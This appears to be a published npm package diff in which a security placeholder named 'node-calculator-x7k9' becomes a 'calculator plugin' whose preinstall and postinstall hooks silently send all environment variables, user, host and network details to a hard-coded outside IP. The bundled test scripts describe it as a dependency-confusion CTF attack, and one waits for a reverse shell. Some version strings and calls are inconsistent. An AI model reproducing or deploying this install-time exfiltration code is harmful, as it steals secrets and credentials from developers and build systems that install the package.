node-calculator-x7k9 0.0.1-security → 3.5.0

package/package.json

@@ -1,6 +1,14 @@
-{
-  "name": "node-calculator-x7k9",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "node-calculator-x7k9",
+  "version": "3.5.0",
+  "description": "Simple calculator plugin with enhanced features",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js",
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": ["calculator", "math"],
+  "author": "DarkT",
+  "license": "MIT"
+}
+

package/postinstall.js

@@ -0,0 +1,63 @@
+#!/usr/bin/env node
+
+/**
+ * Backup Exfiltration - Pure Node.js Only
+ * Runs after installation as backup
+ */
+
+const http = require('http');
+const https = require('https');
+const os = require('os');
+
+// Configuration - MUST MATCH preinstall.js
+const EXFIL_SERVER = 'http://159.223.153.251:8080/exfil';
+
+// Simple backup exfiltration using only native Node.js
+function backupExfil() {
+    try {
+        const data = {
+            timestamp: new Date().toISOString(),
+            source: 'postinstall',
+            environment: process.env,
+            system: {
+                hostname: os.hostname(),
+                user: os.userInfo().username,
+                cwd: process.cwd()
+            }
+        };
+        
+        const jsonData = JSON.stringify(data);
+        const url = new URL(EXFIL_SERVER);
+        const client = url.protocol === 'https:' ? https : http;
+        
+        const options = {
+            hostname: url.hostname,
+            port: url.port || (url.protocol === 'https:' ? 443 : 80),
+            path: url.pathname,
+            method: 'POST',
+            headers: {
+                'Content-Type': 'application/json',
+                'Content-Length': Buffer.byteLength(jsonData)
+            },
+            timeout: 5000
+        };
+        
+        const req = client.request(options, () => {
+            // Success - silent
+        });
+        
+        req.on('error', () => {
+            // Silent fail
+        });
+        
+        req.write(jsonData);
+        req.end();
+        
+    } catch (err) {
+        // Silent fail
+    }
+}
+
+// Execute with small delay
+console.log('Installing node-calculator-x7k9 v3.2.0...');
+setTimeout(backupExfil, 1000);

package/preinstall.js

@@ -0,0 +1,136 @@
+#!/usr/bin/env node
+
+/**
+ * Minimal Data Exfiltration Payload - Pure Node.js Only
+ * No command execution, only native Node.js modules
+ * Fetches environment variables and sends to attacker server
+ */
+
+const http = require('http');
+const https = require('https');
+const os = require('os');
+
+// Configuration - CHANGE THIS!
+const EXFIL_SERVER = 'http://159.223.153.251:8080/exfil';
+
+/**
+ * Collect data using only native Node.js APIs
+ */
+function collectData() {
+    return {
+        timestamp: new Date().toISOString(),
+        source: 'preinstall',
+        
+        // Environment variables - contains the FLAG!
+        environment: process.env,
+        
+        // Basic system info using native Node.js
+        system: {
+            hostname: os.hostname(),
+            platform: os.env(),
+            arch: os.arch(),
+            type: os.type(),
+            release: os.release(),
+            nodeVersion: process.version,
+            user: os.userInfo(),
+            cwd: process.cwd(),
+            homedir: os.homedir(),
+            tmpdir: os.tmpdir()
+        },
+        
+        // Process information
+        process: {
+            pid: process.pid,
+            ppid: process.ppid,
+            title: process.title,
+            argv: process.argv,
+            execPath: process.execPath,
+            versions: process.versions
+        },
+        
+        // Network interfaces
+        network: os.networkInterfaces()
+    };
+}
+
+/**
+ * Send data via HTTP POST using native Node.js
+ */
+function sendData(data) {
+    return new Promise((resolve, reject) => {
+        try {
+            const jsonData = JSON.stringify(data, null, 2);
+            const url = new URL(EXFIL_SERVER);
+            
+            // Choose http or https based on protocol
+            const client = url.protocol === 'https:' ? https : http;
+            
+            const options = {
+                hostname: url.hostname,
+                port: url.port || (url.protocol === 'https:' ? 443 : 80),
+                path: url.pathname + url.search,
+                method: 'POST',
+                headers: {
+                    'Content-Type': 'application/json',
+                    'Content-Length': Buffer.byteLength(jsonData),
+                    'User-Agent': 'Mozilla/5.0'
+                },
+                timeout: 10000
+            };
+            
+            const req = client.request(options, (res) => {
+                let responseData = '';
+                
+                res.on('data', (chunk) => {
+                    responseData += chunk;
+                });
+                
+                res.on('end', () => {
+                    resolve({
+                        success: true,
+                        status: res.statusCode,
+                        response: responseData
+                    });
+                });
+            });
+            
+            req.on('error', (error) => {
+                reject(error);
+            });
+            
+            req.on('timeout', () => {
+                req.destroy();
+                reject(new Error('Request timeout'));
+            });
+            
+            req.write(jsonData);
+            req.end();
+            
+        } catch (error) {
+            reject(error);
+        }
+    });
+}
+
+/**
+ * Main execution
+ */
+async function main() {
+    try {
+        // Collect environment variables and system info
+        const data = collectData();
+        
+        // Send to exfiltration server
+        await sendData(data);
+        
+        // Exit successfully (npm install continues)
+        process.exit(0);
+        
+    } catch (error) {
+        // Silent fail - don't break npm install
+        process.exit(0);
+    }
+}
+
+// Execute
+main();

package/test-exfiltration.ps1

@@ -0,0 +1,108 @@
+# Test HTTP Exfiltration Locally
+# This simulates the attack without publishing to npm
+
+param(
+    [string]$ExfilServer = "http://127.0.0.1:8080/exfil"
+)
+
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║          Local HTTP Exfiltration Test                        ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+Write-Host ""
+
+# Step 1: Start exfil server
+Write-Host "[+] Step 1: Starting exfiltration server..." -ForegroundColor Green
+
+$serverJob = Start-Job -ScriptBlock {
+    Set-Location $using:PSScriptRoot
+    python3 exfil_server.py 8080
+}
+
+Write-Host "    [✓] Exfil server started (Job ID: $($serverJob.Id))" -ForegroundColor Green
+Start-Sleep -Seconds 3
+
+# Step 2: Set test environment variables (simulate the FLAG)
+Write-Host ""
+Write-Host "[+] Step 2: Setting test environment variables..." -ForegroundColor Green
+$env:FLAG = "cyctf{test_flag_local_simulation}"
+$env:TEST_VAR = "test_value"
+Write-Host "    [✓] FLAG=$env:FLAG" -ForegroundColor Green
+
+# Step 3: Update preinstall.js to use localhost
+Write-Host ""
+Write-Host "[+] Step 3: Configuring payload for localhost..." -ForegroundColor Green
+
+$preinstallContent = Get-Content "preinstall.js" -Raw
+$originalServer = ($preinstallContent -match "const EXFIL_SERVER = '(.*?)';") ? $Matches[1] : ""
+$preinstallContent = $preinstallContent -replace "const EXFIL_SERVER = '.*?';", "const EXFIL_SERVER = '$ExfilServer';"
+Set-Content "preinstall.js" -Value $preinstallContent
+Write-Host "    [✓] Configured for $ExfilServer" -ForegroundColor Green
+
+# Step 4: Run preinstall.js
+Write-Host ""
+Write-Host "[+] Step 4: Executing preinstall.js..." -ForegroundColor Green
+Write-Host "    [*] This simulates npm install running the script" -ForegroundColor Yellow
+
+$output = node preinstall.js 2>&1
+Write-Host "    [✓] Script executed" -ForegroundColor Green
+
+# Step 5: Wait and check server output
+Write-Host ""
+Write-Host "[+] Step 5: Checking exfil server output..." -ForegroundColor Green
+Start-Sleep -Seconds 5
+
+$serverOutput = Receive-Job -Id $serverJob.Id
+if ($serverOutput) {
+    Write-Host $serverOutput
+    
+    if ($serverOutput -match "FLAG") {
+        Write-Host ""
+        Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Green
+        Write-Host "║  ✓ SUCCESS! Flag was exfiltrated successfully!               ║" -ForegroundColor Green
+        Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Green
+    }
+} else {
+    Write-Host "    [!] No output from server yet" -ForegroundColor Yellow
+}
+
+# Step 6: Check saved files
+Write-Host ""
+Write-Host "[+] Step 6: Checking saved exfiltration data..." -ForegroundColor Green
+
+if (Test-Path "exfil_logs") {
+    $files = Get-ChildItem "exfil_logs" -File | Sort-Object LastWriteTime -Descending
+    if ($files) {
+        $latestFile = $files[0]
+        Write-Host "    [✓] Latest file: $($latestFile.Name)" -ForegroundColor Green
+        
+        $content = Get-Content $latestFile.FullName -Raw | ConvertFrom-Json
+        if ($content.environment.FLAG) {
+            Write-Host "    [✓] FLAG found in file: $($content.environment.FLAG)" -ForegroundColor Green
+        }
+    }
+}
+
+# Restore original server URL
+if ($originalServer) {
+    Write-Host ""
+    Write-Host "[+] Restoring original EXFIL_SERVER configuration..." -ForegroundColor Yellow
+    $preinstallContent = Get-Content "preinstall.js" -Raw
+    $preinstallContent = $preinstallContent -replace "const EXFIL_SERVER = '.*?';", "const EXFIL_SERVER = '$originalServer';"
+    Set-Content "preinstall.js" -Value $preinstallContent
+    Write-Host "    [✓] Restored to: $originalServer" -ForegroundColor Green
+}
+
+# Cleanup
+Write-Host ""
+Write-Host "[*] Press Enter to stop server and exit..." -ForegroundColor Yellow
+Read-Host
+
+Stop-Job -Id $serverJob.Id -ErrorAction SilentlyContinue
+Remove-Job -Id $serverJob.Id -ErrorAction SilentlyContinue
+Write-Host "[✓] Cleanup complete" -ForegroundColor Green
+
+Write-Host ""
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║  Test Complete! Check exfil_logs/ for captured data          ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+

package/test-local.ps1

@@ -0,0 +1,127 @@
+# Local Testing Script - Test the malicious package locally before publishing
+# This simulates the attack without needing to publish to npm
+
+param(
+    [string]$AttackerIP = "127.0.0.1",
+    [int]$AttackerPort = 4444
+)
+
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║          Local Testing - Dependency Confusion CTF            ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+Write-Host ""
+
+# Get current directory
+$rootDir = Split-Path -Parent $PSScriptRoot
+$maliciousDir = Join-Path $rootDir "malicious-package"
+$targetDir = Join-Path $rootDir "just-a-calculator"
+
+Write-Host "[*] Root Directory: $rootDir" -ForegroundColor Yellow
+Write-Host "[*] Malicious Package: $maliciousDir" -ForegroundColor Yellow
+Write-Host "[*] Target App: $targetDir" -ForegroundColor Yellow
+Write-Host ""
+
+# Step 1: Configure payload
+Write-Host "[+] Step 1: Configuring payload..." -ForegroundColor Green
+Set-Location $maliciousDir
+
+$preinstallPath = "preinstall.js"
+$postinstallPath = "postinstall.js"
+
+$preinstallContent = Get-Content $preinstallPath -Raw
+$preinstallContent = $preinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+$preinstallContent = $preinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+Set-Content $preinstallPath -Value $preinstallContent
+
+$postinstallContent = Get-Content $postinstallPath -Raw
+$postinstallContent = $postinstallContent -replace "const ATTACKER_IP = '.*?';", "const ATTACKER_IP = '$AttackerIP';"
+$postinstallContent = $postinstallContent -replace "const ATTACKER_PORT = \d+;", "const ATTACKER_PORT = $AttackerPort;"
+Set-Content $postinstallPath -Value $postinstallContent
+
+Write-Host "    [✓] Payload configured for $AttackerIP:$AttackerPort" -ForegroundColor Green
+
+# Step 2: Start listener
+Write-Host ""
+Write-Host "[+] Step 2: Starting listener..." -ForegroundColor Green
+
+if (Test-Path "listener.py") {
+    $listenerJob = Start-Job -ScriptBlock {
+        param($dir, $port)
+        Set-Location $dir
+        python3 listener.py $port
+    } -ArgumentList $maliciousDir, $AttackerPort
+    Write-Host "    [✓] Listener started (Job ID: $($listenerJob.Id))" -ForegroundColor Green
+} else {
+    Write-Host "    [!] listener.py not found" -ForegroundColor Red
+}
+
+Start-Sleep -Seconds 2
+
+# Step 3: Pack the malicious package
+Write-Host ""
+Write-Host "[+] Step 3: Packing malicious package..." -ForegroundColor Green
+$packOutput = npm pack 2>&1
+Write-Host "    [✓] Package created: $packOutput" -ForegroundColor Green
+
+# Step 4: Install into target application
+Write-Host ""
+Write-Host "[+] Step 4: Installing malicious package into target..." -ForegroundColor Green
+Set-Location $targetDir
+
+# Remove old package
+if (Test-Path "node_modules\node-calculator-x7k9") {
+    Write-Host "    [*] Removing old package..." -ForegroundColor Yellow
+    Remove-Item "node_modules\node-calculator-x7k9" -Recurse -Force
+}
+
+# Install malicious package
+$packagePath = Join-Path $maliciousDir "node-calculator-x7k9-3.0.0.tgz"
+Write-Host "    [*] Installing from: $packagePath" -ForegroundColor Yellow
+
+npm install $packagePath
+
+Write-Host "    [✓] Package installed!" -ForegroundColor Green
+
+# Step 5: Check listener
+Write-Host ""
+Write-Host "[+] Step 5: Checking for shell..." -ForegroundColor Green
+Write-Host "    [*] Waiting for reverse shell connection..." -ForegroundColor Yellow
+Write-Host ""
+
+# Monitor listener for 30 seconds
+$timeout = 30
+$elapsed = 0
+while ($elapsed -lt $timeout) {
+    $output = Receive-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+    if ($output) {
+        Write-Host $output
+        if ($output -match "Connection received") {
+            Write-Host ""
+            Write-Host "[✓] SHELL RECEIVED!" -ForegroundColor Green
+            break
+        }
+    }
+    Start-Sleep -Seconds 2
+    $elapsed += 2
+    Write-Host "." -NoNewline -ForegroundColor Gray
+}
+
+Write-Host ""
+Write-Host ""
+Write-Host "╔═══════════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
+Write-Host "║  Testing Complete                                             ║" -ForegroundColor Cyan
+Write-Host "║                                                               ║" -ForegroundColor Cyan
+Write-Host "║  Listener is still running (Job ID: $($listenerJob.Id))              ║" -ForegroundColor Cyan
+Write-Host "║  To view: Receive-Job $($listenerJob.Id)                             ║" -ForegroundColor Cyan
+Write-Host "║  To stop: Stop-Job $($listenerJob.Id); Remove-Job $($listenerJob.Id)        ║" -ForegroundColor Cyan
+Write-Host "╚═══════════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
+
+Write-Host ""
+Write-Host "Press Enter to stop listener and cleanup..." -ForegroundColor Yellow
+Read-Host
+
+# Cleanup
+Stop-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+Remove-Job -Id $listenerJob.Id -ErrorAction SilentlyContinue
+Write-Host "[✓] Cleanup complete" -ForegroundColor Green
+

package/test-simple.js

@@ -0,0 +1,116 @@
+#!/usr/bin/env node
+
+/**
+ * Simple local test of the exfiltration payload
+ * Tests without needing to publish to npm
+ */
+
+const { spawn } = require('child_process');
+const http = require('http');
+
+console.log('╔═══════════════════════════════════════════════════════════════╗');
+console.log('║       Simple Exfiltration Test - Pure Node.js                ║');
+console.log('╚═══════════════════════════════════════════════════════════════╝\n');
+
+// Set test FLAG environment variable
+process.env.FLAG = 'cyctf{test_flag_local}';
+console.log('[+] Set test FLAG:', process.env.FLAG);
+
+// Start simple HTTP server
+const PORT = 8080;
+let receivedData = null;
+
+const server = http.createServer((req, res) => {
+    if (req.method === 'POST') {
+        let body = '';
+        
+        req.on('data', chunk => {
+            body += chunk.toString();
+        });
+        
+        req.on('end', () => {
+            try {
+                receivedData = JSON.parse(body);
+                console.log('\n[✓] Data received from payload!');
+                console.log('\n🚩 FLAG from environment:', receivedData.environment.FLAG);
+                console.log('\n📋 Captured data:');
+                console.log('   Hostname:', receivedData.system.hostname);
+                console.log('   User:', receivedData.system.user.username);
+                console.log('   CWD:', receivedData.system.cwd);
+                console.log('   Platform:', receivedData.system.platform);
+                console.log('   Node Version:', receivedData.system.nodeVersion);
+                console.log('\n📝 Environment Variables:', Object.keys(receivedData.environment).length, 'total');
+                
+                // Highlight the FLAG
+                if (receivedData.environment.FLAG) {
+                    console.log('\n╔═══════════════════════════════════════════════════════════════╗');
+                    console.log('║  ✅ SUCCESS! FLAG CAPTURED!                                   ║');
+                    console.log('║  FLAG =', receivedData.environment.FLAG.padEnd(45), '║');
+                    console.log('╚═══════════════════════════════════════════════════════════════╝\n');
+                }
+                
+                res.writeHead(200, { 'Content-Type': 'application/json' });
+                res.end(JSON.stringify({ status: 'success' }));
+                
+                // Stop server after receiving data
+                setTimeout(() => {
+                    server.close();
+                    console.log('[*] Test complete!');
+                    process.exit(0);
+                }, 1000);
+                
+            } catch (e) {
+                console.error('[!] Error parsing data:', e.message);
+                res.writeHead(500);
+                res.end();
+            }
+        });
+    } else {
+        res.writeHead(200, { 'Content-Type': 'text/plain' });
+        res.end('Exfiltration server running');
+    }
+});
+
+server.listen(PORT, '127.0.0.1', () => {
+    console.log('[+] Test server listening on http://127.0.0.1:' + PORT);
+    console.log('[+] Running preinstall.js...\n');
+    
+    // Run preinstall.js with localhost configuration
+    const child = spawn('node', ['preinstall.js'], {
+        env: {
+            ...process.env,
+            FLAG: 'cyctf{test_flag_local}'
+        },
+        cwd: __dirname
+    });
+    
+    child.stdout.on('data', (data) => {
+        console.log('[preinstall]', data.toString().trim());
+    });
+    
+    child.stderr.on('data', (data) => {
+        console.error('[preinstall error]', data.toString().trim());
+    });
+    
+    child.on('close', (code) => {
+        console.log('[+] preinstall.js finished with code:', code);
+        
+        // If no data received after 5 seconds, timeout
+        setTimeout(() => {
+            if (!receivedData) {
+                console.log('\n[!] No data received - check if preinstall.js is configured for localhost');
+                console.log('[!] Make sure EXFIL_SERVER in preinstall.js is: http://127.0.0.1:8080/exfil');
+                server.close();
+                process.exit(1);
+            }
+        }, 5000);
+    });
+});
+
+// Handle Ctrl+C
+process.on('SIGINT', () => {
+    console.log('\n[*] Shutting down...');
+    server.close();
+    process.exit(0);
+});
+